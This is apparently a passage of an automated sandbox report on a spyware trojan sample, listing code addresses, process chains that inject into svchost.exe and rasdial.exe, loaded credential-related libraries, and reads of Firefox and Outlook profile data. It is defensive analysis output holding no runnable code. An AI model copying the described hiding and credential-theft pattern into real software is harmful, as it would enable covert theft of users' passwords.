                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF24463_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE44203_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF6BD73_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFAB403_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3EA803_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C429A03_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D0A9A63_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C569623_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C6E8F03_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C268B83_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4A8403_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C428403_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C32FC83_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4CFE03_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CBEFA03_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB4F403_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C82F283_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C60F303_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE2F303_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFEEDB3_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C52E903_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFCE933_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40E593_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFEE263_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C3ADE03_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C58DBF3_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4AD003_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDCD1F3_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C30CF23_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE0CB53_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C40C003_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C8739A3_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2D34C3_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF132D3_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5B2C03_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE12ED3_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C452A03_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C4B1B03_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C7516C3_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C2F1723_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03D0B16B3_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEF0CC3_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C470C03_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF70E93_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFF0E03_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFF7B03_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF16CC3_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C856303_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDD5B03_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF75713_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C314603_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFF43F3_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB5BF03_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C7DBF93_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5FB803_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFFB763_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CEDAC63_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CDDAAC3_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C85AA03_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CE1AA33_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFFA493_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF7A463_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB3A6C3_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C499503_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5B9503_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CD59103_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C438E03_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CAD8003_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C03FD23_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C03FD53_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C41F923_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFFFB13_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFFF093_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C49EB03_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C5FDC03_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C43D403_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF1D5A3_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CF7D733_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CFFCF23_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03CB9C323_2_03CB9C32
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052105356_2_05210535
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052D05916_2_052D0591
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C24466_2_052C2446
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052BE4F66_2_052BE4F6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052107706_2_05210770
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052347506_2_05234750
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0520C7C06_2_0520C7C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0522C6E06_2_0522C6E0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052001006_2_05200100
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052AA1186_2_052AA118
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052981586_2_05298158
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052D01AA6_2_052D01AA
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C81CC6_2_052C81CC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052A20006_2_052A2000
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CA3526_2_052CA352
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052D03E66_2_052D03E6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0521E3F06_2_0521E3F0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052B02746_2_052B0274
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052902C06_2_052902C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0521AD006_2_0521AD00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052ACD1F6_2_052ACD1F
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05228DBF6_2_05228DBF
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0520ADE06_2_0520ADE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05210C006_2_05210C00
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052B0CB56_2_052B0CB5
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05200CF26_2_05200CF2
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05252F286_2_05252F28
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05230F306_2_05230F30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052B2F306_2_052B2F30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05284F406_2_05284F40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0528EFA06_2_0528EFA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0521CFE06_2_0521CFE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05202FC86_2_05202FC8
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CEE266_2_052CEE26
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05210E596_2_05210E59
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05222E906_2_05222E90
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CCE936_2_052CCE93
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CEEDB6_2_052CEEDB
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052269626_2_05226962
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052129A06_2_052129A0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052DA9A66_2_052DA9A6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0521A8406_2_0521A840
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052128406_2_05212840
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_051F68B86_2_051F68B8
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0523E8F06_2_0523E8F0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CAB406_2_052CAB40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C6BD76_2_052C6BD7
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0520EA806_2_0520EA80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C75716_2_052C7571
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052AD5B06_2_052AD5B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CF43F6_2_052CF43F
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052014606_2_05201460
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CF7B06_2_052CF7B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C16CC6_2_052C16CC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052DB16B6_2_052DB16B
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0524516C6_2_0524516C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_051FF1726_2_051FF172
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0521B1B06_2_0521B1B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C70E96_2_052C70E9
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CF0E06_2_052CF0E0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052170C06_2_052170C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052BF0CC6_2_052BF0CC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C132D6_2_052C132D
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_051FD34C6_2_051FD34C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0525739A6_2_0525739A
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052152A06_2_052152A0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052B12ED6_2_052B12ED
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0522B2C06_2_0522B2C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C7D736_2_052C7D73
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05213D406_2_05213D40
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C1D5A6_2_052C1D5A
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0522FDC06_2_0522FDC0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05289C326_2_05289C32
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CFCF26_2_052CFCF2
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CFF096_2_052CFF09
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CFFB16_2_052CFFB1
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05211F926_2_05211F92
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05219EB06_2_05219EB0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052A59106_2_052A5910
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052199506_2_05219950
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0522B9506_2_0522B950
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0527D8006_2_0527D800
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052138E06_2_052138E0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CFB766_2_052CFB76
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0522FB806_2_0522FB80
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05285BF06_2_05285BF0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0524DBF96_2_0524DBF9
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05283A6C6_2_05283A6C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052CFA496_2_052CFA49
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052C7A466_2_052C7A46
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_05255AA06_2_05255AA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052ADAAC6_2_052ADAAC
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052B1AA36_2_052B1AA3
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_052BDAC66_2_052BDAC6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_03211FE06_2_03211FE0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320B2006_2_0320B200
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320B1FB6_2_0320B1FB
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320B0B06_2_0320B0B0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320D0C06_2_0320D0C0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_032156706_2_03215670
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0321386C6_2_0321386C
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_032138706_2_03213870
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0322BE306_2_0322BE30
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320CEA06_2_0320CEA0
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_0320CE996_2_0320CE99
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FBE78F6_2_04FBE78F
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FBE2D66_2_04FBE2D6
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FBE3F36_2_04FBE3F3
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FBD8586_2_04FBD858
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: 6_2_04FBCAF86_2_04FBCAF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0528F290 appears 105 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 05257E54 appears 102 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 051FB970 appears 272 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0527EA12 appears 86 times
                Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 05245130 appears 58 times
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: String function: 006A9CB3 appears 31 times
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: String function: 006BF9F2 appears 40 times
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: String function: 006C0A30 appears 46 times
                Source: cNDddMAF5u.exe, 00000001.00000003.1349440687.0000000003FE3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cNDddMAF5u.exe
                Source: cNDddMAF5u.exe, 00000001.00000003.1349050815.000000000418D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs cNDddMAF5u.exe
                Source: cNDddMAF5u.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@7/4
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007137B5 GetLastError,FormatMessageW,1_2_007137B5
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007010BF AdjustTokenPrivileges,CloseHandle,1_2_007010BF
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_007016C3
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_007151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,1_2_007151CD
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0072A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,1_2_0072A67C
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_0071648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,1_2_0071648E
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeCode function: 1_2_006A42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,1_2_006A42A2
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeFile created: C:\Users\user~1\AppData\Local\Temp\aut54A3.tmpJump to behavior
                Source: cNDddMAF5u.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rasdial.exe, 00000006.00000002.2583016993.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1892501630.00000000034A2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000003.1892371209.0000000003481000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.00000000034A2000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000006.00000002.2583016993.00000000034D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: cNDddMAF5u.exeVirustotal: Detection: 65%
                Source: cNDddMAF5u.exeReversingLabs: Detection: 81%
                Source: unknownProcess created: C:\Users\user\Desktop\cNDddMAF5u.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cNDddMAF5u.exe"Jump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\cNDddMAF5u.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: cNDddMAF5u.exeStatic file information: File size 1266176 > 1048576
                Source: cNDddMAF5u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: cNDddMAF5u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: cNDddMAF5u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: cNDddMAF5u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: cNDddMAF5u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: cNDddMAF5u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: cNDddMAF5u.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
